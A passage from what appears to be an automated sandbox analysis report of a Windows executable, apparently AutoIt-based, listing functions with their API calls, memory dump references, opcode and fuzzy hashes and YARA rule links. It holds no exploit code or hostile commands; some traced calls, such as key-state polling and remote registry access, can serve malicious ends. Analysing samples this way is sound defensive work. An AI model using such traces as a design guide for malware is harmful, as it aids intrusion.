                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3aaa61b4cf8c164774ae5d96c3008a6f4de598f6da5aae3c3d3751331ed977e6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 16e3377038805004865447be2e32f5d506a0fce31eb04fe6327887a9205f7bbf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aaa61b4cf8c164774ae5d96c3008a6f4de598f6da5aae3c3d3751331ed977e6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D841D331146260BFDB209F39AC44FBA3765AB42374F145259FBA2A72F1D7318D52DB10
                                                                                                                                                                                                                                                                                                    Function 00E213A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E628D1
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E628EA
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E628FA
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E62912
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E62933
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E62942
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E6295F
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E6296E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 1268354404-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: d7c83e3cc311333235d09a493393ad90b85e41226a259d5b9b79390921a4d3f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: a729b72c5c80bf3d740767dc8f641a6461a9fbeb80bc2e17ad4fc3a885c18cdf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7c83e3cc311333235d09a493393ad90b85e41226a259d5b9b79390921a4d3f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80519B30A00609AFDB24DF25DC45BAA7BB5FF98354F10951DFA56B72A0D770E940DB40
                                                                                                                                                                                                                                                                                                    Function 00EB955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00EB95C7
                                                                                                                                                                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00EB95CD
                                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 00EB95D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00EB966E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EB9681
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00EB975B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
                                                                                                                                                                                                                                                                                                    • API String ID: 1924731296-3832140312
                                                                                                                                                                                                                                                                                                    • Opcode ID: b6836d890f14f3d10837065a1d0b86bd5f43720e700520c3f3688b449a62cc84
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c649b760d87e3c725336a9d2e86bf971d9dd1b869c14bb7394c1c2d653fca0a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6836d890f14f3d10837065a1d0b86bd5f43720e700520c3f3688b449a62cc84
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D517871204314AFD704EF20DC56BAB77E4FB88714F001A2DFA95A72E2DB709908CB52
                                                                                                                                                                                                                                                                                                    Function 00E8A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E70D31,00000001,0000138C,00000001,00000000,00000001,?,00E9EEAE,00EF2430), ref: 00E8A091
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00E70D31,00000001), ref: 00E8A09A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E70D31,00000001,0000138C,00000001,00000000,00000001,?,00E9EEAE,00EF2430,?), ref: 00E8A0BC
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00E70D31,00000001), ref: 00E8A0BF
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E8A1E0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6d430bff8cbb34bfb538c3d073ec2a882479298c5127c07776bd46d63e7dff99
                                                                                                                                                                                                                                                                                                    • Instruction ID: d8c2ecf74f6095fe86e5249e5a1eacae832a1abfa18d4a4c9c934de9b19577ca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d430bff8cbb34bfb538c3d073ec2a882479298c5127c07776bd46d63e7dff99
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B341407280022DAADF15FBE0ED46DEEB7B8AF18300F502165F505B6092EB756F49CB61
                                                                                                                                                                                                                                                                                                    Function 00E80FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E81093
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E810AF
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E810CB
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E810F5
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E8111D
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E81128
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8112D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                    • Opcode ID: dabf04fa0632c3097e65f180306843260e00bca53b62e31717241110145e6c4d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a8f6198e6337901d4cdb73fdd5445ebc748bd8e0491ad9259bf35d86ccf7ad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dabf04fa0632c3097e65f180306843260e00bca53b62e31717241110145e6c4d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2941F672C1022DAFDF21EBA4EC85DEEB7B8BF14750F405169E905B61A1EB319E09CB50
                                                                                                                                                                                                                                                                                                    Function 00EB4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EB4AD9
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00EB4AE0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EB4AF3
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EB4AFB
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EB4B06
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00EB4B10
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB4B1A
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00EB4B30
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00EB4B3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a07d7564ef14f0e2020837d07ae77413066eb14ae19244927e088b99931eeaa
                                                                                                                                                                                                                                                                                                    • Instruction ID: d8463fad114fb3d7ed607881680f06ab1ff805ea4f521308b9d3099275fe5911
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a07d7564ef14f0e2020837d07ae77413066eb14ae19244927e088b99931eeaa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9315872105219AFDF129FA5DC48FDB3BA9EF09368F110311FA14B61A0D735D854DB94
                                                                                                                                                                                                                                                                                                    Function 00E8D11F Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00E8D1BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                                                                                                                                    • String ID: \+$\+$`+$blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                    • API String ID: 2457776203-3382907240
                                                                                                                                                                                                                                                                                                    • Opcode ID: 973ae58518ef86fc6fce450cd6b19e4a02b443bbaab188c948689bfa37360b56
                                                                                                                                                                                                                                                                                                    • Instruction ID: 88f916b739c7b222913adb21112caadfb023c41a540dc840dcb810dc071a67af
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 973ae58518ef86fc6fce450cd6b19e4a02b443bbaab188c948689bfa37360b56
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1011293574E70ABEE7056B55EC86EAE77EC9F05764B20202AF90CB61C1E7B4AE404760
                                                                                                                                                                                                                                                                                                    Function 00EA468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA46B9
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EA46E7
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EA46F1
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA478A
                                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EA480E
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EA4932
                                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EA496B
                                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00EC0B64,?), ref: 00EA498A
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00EA499D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EA4A21
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA4A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 378a5ede01e89347b5221b0197ba560130688f6bd5684561b25f0b4f2d16e33a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 425ed2aa83a93811ce7b799adbee503c068cdcb16cea96379b21b5ee08e39030
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 378a5ede01e89347b5221b0197ba560130688f6bd5684561b25f0b4f2d16e33a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAC124B16083059F8704DF68C88496BB7E9FFCA748F10591DF989AB260DB71ED05CB52
                                                                                                                                                                                                                                                                                                    Function 00E984DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E98538
                                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E985D4
                                                                                                                                                                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00E985E8
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CD4,00000000,00000001,00EE7E8C,?), ref: 00E98634
                                                                                                                                                                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E986B9
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00E98711
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00E9879C
                                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E987BF
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00E987C6
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00E9881B
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E98821
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7015a77d83ba9cbfa438795e3d195561cddbaf98e3dc0a1ee5d61e686ea15881
                                                                                                                                                                                                                                                                                                    • Instruction ID: b18078a0cc7adaf0da1db86cc338045a93f6445d4eeb734dfb62dd4e8728a079
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7015a77d83ba9cbfa438795e3d195561cddbaf98e3dc0a1ee5d61e686ea15881
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64C13A75A00119AFCB14DFA4C984DAEBBF9FF49304B149199F419EB261DB30ED45CB90
                                                                                                                                                                                                                                                                                                    Function 00E80378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E8039F
                                                                                                                                                                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00E803F8
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00E8040A
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8042A
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00E8047D
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E80491
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E804A6
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00E804B3
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E804BC
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E804CE
                                                                                                                                                                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E804D9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
